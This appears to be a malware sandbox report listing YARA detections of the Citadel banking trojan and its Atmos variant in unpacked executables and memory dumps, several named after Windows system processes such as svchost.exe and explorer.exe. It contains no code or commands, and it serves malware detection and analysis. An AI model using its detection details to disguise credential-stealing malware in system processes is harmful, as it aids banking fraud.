Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.services.png.exe.2590000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0.3.services.png.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000003.1693418014.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000003.1699808293.00000000021C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000001.00000000.1699967711.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer Author: xylitol@temari.fr
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Citadel 1.5.x.y trojan banker Author: Jean-Philippe Teissier / @Jipe_
Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Generic Spyware.Citadel.Atmos Signature Author: xylitol@temari.fr
